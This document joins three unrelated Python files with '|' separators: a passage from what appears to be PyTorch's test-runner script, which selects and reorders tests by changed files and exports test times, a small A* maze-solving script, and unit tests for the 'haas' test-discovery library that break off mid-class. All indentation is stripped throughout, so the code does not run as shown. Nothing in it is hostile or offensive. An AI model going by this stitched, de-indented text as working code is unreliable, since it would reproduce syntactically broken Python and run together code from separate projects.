if parts[0] in ['docs', 'scripts', 'CODEOWNERS', 'README.md']:
return 'NONE'
elif parts[0] == 'torch':
if parts[-1].endswith('.py') or parts[-1].endswith('.pyi'):
return 'TORCH'
elif parts[0] == 'caffe2':
if parts[-1].endswith('.py') or parts[-1].endswith('.pyi'):
return 'CAFFE2'
elif parts[0] == 'test':
if parts[-1].endswith('.py') or parts[-1].endswith('.pyi'):
return 'TEST'
return 'UNKNOWN'
def log_test_reason(file_type, filename, test, options):
if options.verbose:
print_to_stderr(
'Determination found {} file {} -- running {}'.format(
file_type,
filename,
test,
)
)
def get_dep_modules(test):
# Cache results in case of repetition
if test in _DEP_MODULES_CACHE:
return _DEP_MODULES_CACHE[test]
repo_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
test_location = os.path.join(repo_root, 'test', test + '.py')
finder = modulefinder.ModuleFinder(
# Ideally exclude all third party modules, to speed up calculation.
excludes=[
'scipy',
'numpy',
'numba',
'multiprocessing',
'sklearn',
'setuptools',
'hypothesis',
'llvmlite',
'joblib',
'email',
'importlib',
'unittest',
'urllib',
'json',
'collections',
# Modules below are excluded because they are hitting https://bugs.python.org/issue40350
# Trigger AttributeError: 'NoneType' object has no attribute 'is_package'
'mpl_toolkits',
'google',
'onnx',
# Triggers RecursionError
'mypy'
],
)
# HACK: some platforms default to ascii, so we can't just run_script :(
with open(test_location, 'r', encoding='utf-8') as fp:
finder.load_module('__main__', fp, test_location, ('', 'r', 1))
dep_modules = set(finder.modules.keys())
_DEP_MODULES_CACHE[test] = dep_modules
return dep_modules
def determine_target(target_det_list, test, touched_files, options):
test = parse_test_module(test)
# Some tests are faster to execute than to determine.
if test not in target_det_list:
if options.verbose:
print_to_stderr(f'Running {test} without determination')
return True
# HACK: "no_ninja" is not a real module
if test.endswith('_no_ninja'):
test = test[:(-1 * len('_no_ninja'))]
if test.endswith('_ninja'):
test = test[:(-1 * len('_ninja'))]
dep_modules = get_dep_modules(test)
for touched_file in touched_files:
file_type = test_impact_of_file(touched_file)
if file_type == 'NONE':
continue
elif file_type == 'CI':
# Force all tests to run if any change is made to the CI
# configurations.
log_test_reason(file_type, touched_file, test, options)
return True
elif file_type == 'UNKNOWN':
# Assume uncategorized source files can affect every test.
log_test_reason(file_type, touched_file, test, options)
return True
elif file_type in ['TORCH', 'CAFFE2', 'TEST']:
parts = os.path.splitext(touched_file)[0].split(os.sep)
touched_module = ".".join(parts)
# test/ path does not have a "test." namespace
if touched_module.startswith('test.'):
touched_module = touched_module.split('test.')[1]
if (
touched_module in dep_modules
or touched_module == test.replace('/', '.')
):
log_test_reason(file_type, touched_file, test, options)
return True
# If nothing has determined the test has run, don't run the test.
if options.verbose:
print_to_stderr(f'Determination is skipping {test}')
return False
def run_test_module(test: str, test_directory: str, options) -> Optional[str]:
test_module = parse_test_module(test)
# Printing the date here can help diagnose which tests are slow
print_to_stderr('Running {} ... [{}]'.format(test, datetime.now()))
handler = CUSTOM_HANDLERS.get(test_module, run_test)
return_code = handler(test_module, test_directory, options)
assert isinstance(return_code, int) and not isinstance(
return_code, bool), 'Return code should be an integer'
if return_code == 0:
return None
message = f'{test} failed!'
if return_code < 0:
# subprocess.Popen returns the child process' exit signal as
# return code -N, where N is the signal number.
signal_name = SIGNALS_TO_NAMES_DICT[-return_code]
message += f' Received signal: {signal_name}'
return message
def export_S3_test_times(test_times_filename: str, test_times: Dict[str, float]) -> None:
if os.path.exists(test_times_filename):
print(f'Overwriting existent file: {test_times_filename}')
with open(test_times_filename, 'w+') as file:
job_times_json = get_job_times_json(test_times)
json.dump(job_times_json, file, indent=' ', separators=(',', ': '))
file.write('\n')
def query_changed_test_files() -> List[str]:
cmd = ["git", "diff", "--name-only", "origin/master", "HEAD"]
proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if proc.returncode != 0:
raise RuntimeError("Unable to get changed files")
lines = proc.stdout.decode().strip().split("\n")
lines = [line.strip() for line in lines]
return lines
def reorder_tests(tests: List[str]) -> List[str]:
try:
changed_files = query_changed_test_files()
except Exception:
# If unable to get changed files from git, quit without doing any sorting
return tests
prefix = f"test{os.path.sep}"
changed_tests = [f for f in changed_files if f.startswith(prefix) and f.endswith(".py")]
changed_tests = [f[len(prefix):] for f in changed_tests]
changed_tests = [f[:-len(".py")] for f in changed_tests]
bring_to_front = []
the_rest = []
for test in tests:
if test in changed_tests:
bring_to_front.append(test)
else:
the_rest.append(test)
sorted_tests = bring_to_front + the_rest
if len(sorted_tests) != len(tests):
# Something went wrong, bail out without doing any sorting
return tests
return sorted_tests
def main():
options = parse_args()
test_times_filename = options.export_past_test_times
if test_times_filename:
print(f'Exporting past test times from S3 to {test_times_filename}, no tests will be run.')
export_S3_test_times(test_times_filename, pull_job_times_from_S3())
return
test_directory = os.path.dirname(os.path.abspath(__file__))
selected_tests = get_selected_tests(options)
if options.verbose:
print_to_stderr('Selected tests: {}'.format(', '.join(selected_tests)))
if options.coverage and not PYTORCH_COLLECT_COVERAGE:
shell(['coverage', 'erase'])
if options.jit:
selected_tests = filter(lambda test_name: "jit" in test_name, TESTS)
if options.determine_from is not None and os.path.exists(options.determine_from):
slow_tests = get_slow_tests_based_on_S3()
print('Added the following tests to target_det tests as calculated based on S3:')
print(slow_tests)
with open(options.determine_from, 'r') as fh:
touched_files = [
os.path.normpath(name.strip()) for name in fh.read().split('\n')
if len(name.strip()) > 0
]
# HACK: Ensure the 'test' paths can be traversed by Modulefinder
sys.path.append('test')
selected_tests = [
test for test in selected_tests
if determine_target(TARGET_DET_LIST + slow_tests, test, touched_files, options)
]
sys.path.remove('test')
selected_tests = reorder_tests(selected_tests)
has_failed = False
failure_messages = []
try:
for test in selected_tests:
options_clone = copy.deepcopy(options)
if test in USE_PYTEST_LIST:
options_clone.pytest = True
err_message = run_test_module(test, test_directory, options_clone)
if err_message is None:
continue
has_failed = True
failure_messages.append(err_message)
if not options_clone.continue_through_error:
raise RuntimeError(err_message)
print_to_stderr(err_message)
finally:
if options.coverage:
from coverage import Coverage
test_dir = os.path.dirname(os.path.abspath(__file__))
with set_cwd(test_dir):
cov = Coverage()
if PYTORCH_COLLECT_COVERAGE:
cov.load()
cov.combine(strict=False)
cov.save()
if not PYTORCH_COLLECT_COVERAGE:
cov.html_report()
if options.continue_through_error and has_failed:
for err in failure_messages:
print_to_stderr(err)
sys.exit(1)
if __name__ == '__main__':
main()
|
class Node:
def __init__(self, position: (), parent: ()):
self.position = position
self.parent = parent
self.g = 0
self.h = 0
self.f = 0
def __eq__(self, other):
return self.position == other.position
def __lt__(self, other):
return self.f < other.f
def __repr__(self):
return ('({0},{1})'.format(self.position, self.f))
def draw_grid(map, width, height, spacing=2, **kwargs):
for y in range(height):
for x in range(width):
print('%%-%ds' % spacing % draw_tile(map, (x, y), kwargs), end='')
print()
def draw_tile(map, position, kwargs):
value = map.get(position)
if 'path' in kwargs and position in kwargs['path']: value = '+'
if 'start' in kwargs and position == kwargs['start']: value = '@'
if 'goal' in kwargs and position == kwargs['goal']: value = '$'
return value
def astar_search(map, start, end):
open = []
closed = []
start_node = Node(start, None)
goal_node = Node(end, None)
open.append(start_node)
while len(open) > 0:
open.sort()
current_node = open.pop(0)
closed.append(current_node)
if current_node == goal_node:
path = []
while current_node != start_node:
path.append(current_node.position)
current_node = current_node.parent
return path[::-1]
(x, y) = current_node.position
neighbors = [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)]
for next in neighbors:
map_value = map.get(next)
if (map_value == '#'):
continue
neighbor = Node(next, current_node)
if (neighbor in closed):
continue
neighbor.g = abs(neighbor.position[0] - start_node.position[0]) + abs(
neighbor.position[1] - start_node.position[1])
neighbor.h = abs(neighbor.position[0] - goal_node.position[0]) + abs(
neighbor.position[1] - goal_node.position[1])
neighbor.f = neighbor.g + neighbor.h
if (add_to_open(open, neighbor) == True):
open.append(neighbor)
return None
def add_to_open(open, neighbor):
for node in open:
if (neighbor == node and neighbor.f >= node.f):
return False
return True
def main():
map = {}
chars = ['c']
start = None
end = None
width = 0
height = 0
fp = open('data\\maze.in', 'r')
while len(chars) > 0:
chars = [str(i) for i in fp.readline().strip()]
width = len(chars) if width == 0 else width
for x in range(len(chars)):
map[(x, height)] = chars[x]
if (chars[x] == '@'):
start = (x, height)
elif (chars[x] == '$'):
end = (x, height)
if (len(chars) > 0):
height += 1
fp.close()
path = astar_search(map, start, end)
print()
print(path)
print()
draw_grid(map, width, height, spacing=1, path=path, start=start, goal=end)
print()
print('Steps to goal: {0}'.format(len(path)))
print()
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
# Copyright (c) 2013-2014 Simon Jagoe
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the 3-clause BSD license. See the LICENSE.txt file for details.
from __future__ import absolute_import, unicode_literals
import os
import shutil
import sys
import tempfile
import unittest as python_unittest
from haas.testing import unittest
from haas.tests import _test_cases, builder
from haas.tests.compat import mock
from haas.loader import Loader
from haas.module_import_error import ModuleImportError
from haas.suite import find_test_cases, TestSuite
from haas.utils import cd
from ..discoverer import (
Discoverer,
filter_test_suite,
find_module_by_name,
find_top_level_directory,
get_module_name,
)
class FilterTestCase(_test_cases.TestCase):
pass
class TestDiscoveryMixin(object):
def setUp(self):
self.tmpdir = os.path.abspath(tempfile.mkdtemp())
self.dirs = dirs = ['haas_test_package', 'tests']
path = self.tmpdir
for dir_ in dirs:
path = os.path.join(path, dir_)
os.makedirs(path)
with open(os.path.join(path, '__init__.py'), 'w'):
pass
destdir = os.path.join(self.tmpdir, *dirs)
base = os.path.splitext(_test_cases.__file__)[0]
srcfile = '{0}.py'.format(base)
shutil.copyfile(
srcfile, os.path.join(destdir, 'test_cases.py'))
def tearDown(self):
for key in list(sys.modules.keys()):
if key in sys.modules and key.startswith(self.dirs[0]):
del sys.modules[key]
if self.tmpdir in sys.path:
sys.path.remove(self.tmpdir)
shutil.rmtree(self.tmpdir)
def get_test_cases(self, suite):
for test in find_test_cases(suite):
yield test
class TestFindTopLevelDirectory(TestDiscoveryMixin, unittest.TestCase):
def test_from_top_level_directory(self):
directory = find_top_level_directory(self.tmpdir)
self.assertEqual(directory, self.tmpdir)
def test_from_leaf_directory(self):
directory = find_top_level_directory(
os.path.join(self.tmpdir, *self.dirs))
self.assertEqual(directory, self.tmpdir)
def test_from_middle_directory(self):
directory = find_top_level_directory(
os.path.join(self.tmpdir, self.dirs[0]))
self.assertEqual(directory, self.tmpdir)
def test_from_nonpackage_directory(self):
nonpackage = os.path.join(self.tmpdir, self.dirs[0], 'nonpackage')
os.makedirs(nonpackage)
directory = find_top_level_directory(nonpackage)
self.assertEqual(directory, nonpackage)
def test_relative_directory(self):
relative = os.path.join(self.tmpdir, self.dirs[0], '..', *self.dirs)
directory = find_top_level_directory(relative)
self.assertEqual(directory, self.tmpdir)
def test_no_top_level(self):
os_path_dirname = os.path.dirname
def dirname(path):
if os.path.basename(os_path_dirname(path)) not in self.dirs:
return path
return os_path_dirname(path)
with mock.patch('os.path.dirname', dirname):
with self.assertRaises(ValueError):
find_top_level_directory(os.path.join(self.tmpdir, *self.dirs))
class TestGetModuleName(TestDiscoveryMixin, unittest.TestCase):
def test_module_in_project(self):
module_path = os.path.join(self.tmpdir, *self.dirs)
module_name = get_module_name(self.tmpdir, module_path)
self.assertEqual(module_name, '.'.join(self.dirs))
def test_module_not_in_project_deep(self):
module_path = os.path.join(self.tmpdir, *self.dirs)
with self.assertRaises(ValueError):
get_module_name(os.path.dirname(__file__), module_path)
def test_module_not_in_project_relpath(self):
module_path = os.path.abspath(
os.path.join(self.tmpdir, '..', *self.dirs))
with self.assertRaises(ValueError):
get_module_name(self.tmpdir, module_path)
class TestFindModuleByName(TestDiscoveryMixin, unittest.TestCase):
def setUp(self):
TestDiscoveryMixin.setUp(self)
sys.path.insert(0, self.tmpdir)
def tearDown(self):
sys.path.remove(self.tmpdir)
TestDiscoveryMixin.tearDown(self)
def test_package_in_project(self):
module, case_attributes = find_module_by_name('.'.join(self.dirs))
dirname = os.path.join(self.tmpdir, *self.dirs)
filename = os.path.join(dirname, '__init__')
self.assertEqual(os.path.splitext(module.__file__)[0], filename)
def test_missing_package_in_project(self):
module_name = '.'.join(self.dirs + ['missing'])
module, case_attributes = find_module_by_name(module_name)
dirname = os.path.join(self.tmpdir, *self.dirs)
filename = os.path.join(dirname, '__init__')
self.assertEqual(os.path.splitext(module.__file__)[0], filename)
self.assertEqual(case_attributes, ['missing'])
def test_module_attribute_in_project(self):
module_name = '.'.join(self.dirs + ['test_cases'])
test_case_name = '.'.join([module_name, 'TestCase'])
try:
module, case_attributes = find_module_by_name(test_case_name)
module_file = module.__file__
finally:
del sys.modules[module_name]
dirname = os.path.join(self.tmpdir, *self.dirs)
filename = os.path.join(dirname, 'test_cases')
self.assertEqual(os.path.splitext(module_file)[0], filename)
self.assertEqual(case_attributes, ['TestCase'])
def test_missing_top_level_package_in_project(self):
with self.assertRaises(ImportError):
find_module_by_name('no_module')
class TestFilterTestSuite(unittest.TestCase):
def setUp(self):
self.case_1 = _test_cases.TestCase(methodName='test_method')
self.case_2 = _test_cases.TestCase(methodName='_private_method')
self.case_3 = FilterTestCase(methodName='_private_method')
self.suite = TestSuite(
[
TestSuite(
[
self.case_1,
self.case_2,
],
),
TestSuite(
[
self.case_3,
],
),
],
)
def tearDown(self):
del self.suite
del self.case_3
del self.case_2
del self.case_1
def test_filter_by_method_name(self):
filtered_suite = filter_test_suite(self.suite, 'test_method')
self.assertEqual(len(filtered_suite), 1)
test, = filtered_suite
self.assertIs(test, self.case_1)
def test_filter_by_class_name(self):
filtered_suite = filter_test_suite(self.suite, 'FilterTestCase')
self.assertEqual(len(filtered_suite), 1)
test, = filtered_suite
self.assertIs(test, self.case_3)
def test_filter_by_module_name(self):
filtered_suite = filter_test_suite(self.suite, '_test_cases')
self.assertEqual(len(filtered_suite), 2)
test1, test2 = filtered_suite
self.assertIs(test1, self.case_1)
self.assertIs(test2, self.case_2)
def test_filter_by_package_name(self):
filtered_suite = filter_test_suite(self.suite, 'test_discoverer')
self.assertEqual(len(filtered_suite), 1)
test, = filtered_suite
self.assertIs(test, self.case_3)
def test_filter_by_nonexistant_name(self):
filtered_suite = filter_test_suite(self.suite, 'nothing_called_this')
self.assertEqual(len(filtered_suite), 0)
def test_filter_by_class_and_test_name(self):
filtered_suite = filter_test_suite(
self.suite, 'TestCase.test_method')
self.assertEqual(len(filtered_suite), 1)
test, = filtered_suite
self.assertIs(test, self.case_1)
def test_filter_by_module_and_class(self):
filtered_suite = filter_test_suite(
self.suite, '_test_cases.TestCase')
self.assertEqual(len(filtered_suite), 2)
test1, test2 = filtered_suite
self.assertIs(test1, self.case_1)
self.assertIs(test2, self.case_2)
def test_filter_by_module_and_class_and_test(self):
filtered_suite = filter_test_suite(
self.suite, '_test_cases.TestCase.test_method')
self.assertEqual(len(filtered_suite), 1)
test1, = filtered_suite
self.assertIs(test1, self.case_1)
class TestDiscoveryByPath(TestDiscoveryMixin, unittest.TestCase):
def setUp(self):
TestDiscoveryMixin.setUp(self)
self.discoverer = Discoverer(Loader())
def tearDown(self):
del self.discoverer
TestDiscoveryMixin.tearDown(self)
def assertSuite(self, suite):
self.assertIsInstance(suite, TestSuite)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 2)
for test in tests:
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_from_top_level_directory(self):
suite = self.discoverer.discover(self.tmpdir)
self.assertSuite(suite)
def test_from_leaf_directory(self):
suite = self.discoverer.discover(os.path.join(self.tmpdir, *self.dirs))
self.assertSuite(suite)
def test_from_middle_directory(self):
suite = self.discoverer.discover(
os.path.join(self.tmpdir, self.dirs[0]))
self.assertSuite(suite)
def test_start_from_nonpackage_directory(self):
nonpackage = os.path.join(self.tmpdir, self.dirs[0], 'nonpackage')
os.makedirs(nonpackage)
suite = self.discoverer.discover(nonpackage)
self.assertEqual(len(list(suite)), 0)
def test_from_nested_nonpackage_directory(self):
"""
Regression test for #38
"""
# Given
nonpackage = os.path.join(self.tmpdir, 'nonpackage')
package = os.path.join(nonpackage, 'nonpackage', 'tests')
os.makedirs(package)
with open(os.path.join(package, '__init__.py'), 'w'):
pass
with open(os.path.join(package, 'test.py'), 'w'):
pass
# When
suite = self.discoverer.discover(nonpackage, nonpackage)
# Then
self.assertEqual(suite.countTestCases(), 0)
def test_relative_directory(self):
relative = os.path.join(self.tmpdir, self.dirs[0], '..', *self.dirs)
suite = self.discoverer.discover(relative)
self.assertSuite(suite)
def test_given_correct_top_level_directory(self):
suite = self.discoverer.discover(
self.tmpdir, top_level_directory=self.tmpdir)
self.assertSuite(suite)
def test_given_incorrect_top_level_directory(self):
with self.assertRaises(ImportError):
self.discoverer.discover(
self.tmpdir,
top_level_directory=os.path.dirname(self.tmpdir),
)
def test_top_level_directory_on_path(self):
sys.path.insert(0, self.tmpdir)
try:
suite = self.discoverer.discover(self.tmpdir)
finally:
sys.path.remove(self.tmpdir)
self.assertSuite(suite)
class TestDiscoveryByModule(TestDiscoveryMixin, unittest.TestCase):
def setUp(self):
TestDiscoveryMixin.setUp(self)
self.discoverer = Discoverer(Loader())
def tearDown(self):
del self.discoverer
TestDiscoveryMixin.tearDown(self)
def test_discover_package(self):
suite = self.discoverer.discover(
'.'.join(self.dirs),
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 2)
for test in tests:
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_package_no_top_level(self):
suite = self.discoverer.discover('haas.tests')
tests = list(self.get_test_cases(suite))
self.assertGreater(len(tests), 1)
def test_discover_module(self):
module = '{0}.test_cases'.format('.'.join(self.dirs))
suite = self.discoverer.discover(
module, top_level_directory=self.tmpdir)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 2)
for test in tests:
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_case(self):
module = '{0}.test_cases.TestCase'.format('.'.join(self.dirs))
suite = self.discoverer.discover(
module, top_level_directory=self.tmpdir)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_missing_case(self):
module = '{0}.test_cases.MissingTestCase'.format('.'.join(self.dirs))
suite = self.discoverer.discover(
module, top_level_directory=self.tmpdir)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 0)
def test_discover_not_case(self):
module = '{0}.test_cases.NotTestCase'.format('.'.join(self.dirs))
suite = self.discoverer.discover(
module, top_level_directory=self.tmpdir)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 0)
def test_discover_method(self):
module = '{0}.test_cases.TestCase.test_method'.format(
'.'.join(self.dirs))
suite = self.discoverer.discover(
module, top_level_directory=self.tmpdir)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_too_many_components(self):
module = '{0}.test_cases.TestCase.test_method.nothing'.format(
'.'.join(self.dirs))
with self.assertRaises(ValueError):
self.discoverer.discover(module, top_level_directory=self.tmpdir)
class TestDiscoverFilteredTests(TestDiscoveryMixin, unittest.TestCase):
def setUp(self):
TestDiscoveryMixin.setUp(self)
self.discoverer = Discoverer(Loader())
def tearDown(self):
del self.discoverer
TestDiscoveryMixin.tearDown(self)
def test_discover_subpackage(self):
suite = self.discoverer.discover(
'tests',
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 2)
for test in tests:
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_test_method(self):
suite = self.discoverer.discover(
'test_method',
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 2)
for test in tests:
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_class(self):
suite = self.discoverer.discover(
'TestCase',
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_no_top_level(self):
getcwd = mock.Mock()
getcwd.return_value = self.tmpdir
with mock.patch.object(os, 'getcwd', getcwd):
suite = self.discoverer.discover(
'TestCase',
)
getcwd.assert_called_once_with()
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_class_and_method(self):
suite = self.discoverer.discover(
'TestCase.test_method',
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_module_and_class_and_method(self):
suite = self.discoverer.discover(
'test_cases.TestCase.test_method',
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
def test_discover_module_and_class(self):
suite = self.discoverer.discover(
'test_cases.TestCase',
top_level_directory=self.tmpdir,
)
tests = list(self.get_test_cases(suite))
self.assertEqual(len(tests), 1)
test, = tests
self.assertIsInstance(test, python_unittest.TestCase)
self.assertEqual(test._testMethodName, 'test_method')
class TestDiscovererImportError(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
module1 = builder.Module('test_something.py', (klass,))
module2 = builder.Module('test_something_else.py', (klass,))
subpackage = builder.Package(
'subpackage',
(
builder.Package('package1', (module1,)),
builder.Package('package2', (module2,)),
),
)
package = builder.Package('package', (subpackage,))
fixture = builder.Package('fixture', (package,))
fixture.create(self.tempdir)
module_path = os.path.join(
self.tempdir, fixture.name, package.name, subpackage.name,
module1.name)
with open(module_path, 'w') as fh:
fh.write('import haas.i_dont_exist\n')
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_creates_importerror_testcase(self):
with cd(self.tempdir):
suite = Discoverer(Loader()).discover(
self.tempdir, self.tempdir)
self.assertEqual(suite.countTestCases(), 3)
case_names = [
type(case).__name__ for case in find_test_cases(suite)]
self.assertEqual(
case_names, ['ModuleImportError', 'TestSomething',
'TestSomething'])
def test_importerror_testcase(self):
with cd(self.tempdir):
suite = Discoverer(Loader()).discover(
self.tempdir, self.tempdir)
self.assertEqual(suite.countTestCases(), 3)
result = unittest.TestResult()
suite.run(result)
self.assertEqual(len(result.errors), 1)
class TestDiscovererNonPackageImport(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
module1 = builder.Module('test_something.py', (klass,))
module2 = builder.Module('test_something_else.py', (klass,))
subpackage = builder.Directory(
'subpackage',
(
builder.Package('package1', (module1,)),
builder.Package('package2', (module2,)),
),
)
package = builder.Directory('package', (subpackage,))
fixture = builder.Directory('fixture', (package,))
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_skips_non_packages(self):
with cd(self.tempdir):
suite = Discoverer(Loader()).discover(self.tempdir, self.tempdir)
self.assertEqual(suite.countTestCases(), 0)
class TestDiscovererDotInModuleName(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
expected_klass = builder.Class(
'TestExpected',
(
builder.Method('test_expected'),
),
)
module1 = builder.Module('test_some.thing.py', (klass,))
module2 = builder.Module('test_something_else.py', (klass,))
module3 = builder.Module('test_another_one.py', (expected_klass,))
subpackage = builder.Package(
'subpackage',
(
builder.Package('package1', (module1,)),
builder.Package('packa.ge2', (module2,)),
builder.Package('package3', (module3,)),
),
)
package = builder.Package('package', (subpackage,))
fixture = builder.Package('fixture', (package,))
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_tests(self):
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover(self.tempdir, self.tempdir)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertEqual(type(case).__name__, 'TestExpected')
self.assertEqual(case._testMethodName, 'test_expected')
class TestDiscovererNeverFilterModuleImportError(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
text = builder.RawText('ImportError', 'import haas.i_dont_exist')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
module = builder.Module('test_importerror.py', (text, klass,))
package = builder.Package('package', (module,))
fixture = builder.Package('fixture', (package,))
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_tests(self):
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover('TestSomething', None)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertIsInstance(case, ModuleImportError)
self.assertEqual(case._testMethodName, 'test_error')
class TestDiscovererSelectiveFilterPackageImportError(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
text = builder.RawText('ImportError', 'from . import i_dont_exist')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
module = builder.Module('test_importerror.py', (klass,))
fixture = builder.Directory(
'testing_package',
(
builder.Module('__init__.py', (text,)),
module,
),
)
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_tests(self):
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover('TestSomething', None)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertIsInstance(case, ModuleImportError)
self.assertEqual(case._testMethodName, 'test_error')
class TestDiscovererFindTestsByFilePath(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
module = builder.Module('test_something.py', (klass,))
package = builder.Package('package', (module,))
fixture = builder.Package('fixture', (package,))
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_tests_no_prefix_dot_slash(self):
# Given
start = 'fixture/package/test_something.py'
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover(start, None)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertEqual(type(case).__name__, 'TestSomething')
self.assertEqual(case._testMethodName, 'test_method')
def test_discover_tests_with_dot_slash(self):
# Given
start = './fixture/package/test_something.py'
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover(start, None)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertEqual(type(case).__name__, 'TestSomething')
self.assertEqual(case._testMethodName, 'test_method')
class TestDiscovererEmacsRecoveryFiles(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
module = builder.Module('.#test_module.py', (klass,))
module = builder.Module('test_module.py', (klass,))
fixture = builder.Package(
'testing_package',
(
module,
),
)
fixture.create(self.tempdir)
def tearDown(self):
if self.tempdir in sys.path:
sys.path.remove(self.tempdir)
modules_to_remove = [key for key in sys.modules
if key not in self.modules]
for key in modules_to_remove:
del sys.modules[key]
del self.modules
shutil.rmtree(self.tempdir)
def test_discover_error_emacs_recovery_file(self):
# When
with cd(self.tempdir):
suite = Discoverer(Loader()).discover('TestSomething', None)
# Then
self.assertEqual(suite.countTestCases(), 1)
case, = find_test_cases(suite)
self.assertIsInstance(case, unittest.TestCase)
self.assertEqual(case._testMethodName, 'test_method')
class TestDiscovererExceptionOnModuleImport(unittest.TestCase):
def setUp(self):
self.modules = sys.modules.copy()
self.tempdir = tempfile.mkdtemp(prefix='haas-tests-')
text = builder.RawText('RuntimeError', 'raise RuntimeError("failed")')
klass = builder.Class(
'TestSomething',
(
builder.Method('test_method'),
),
)
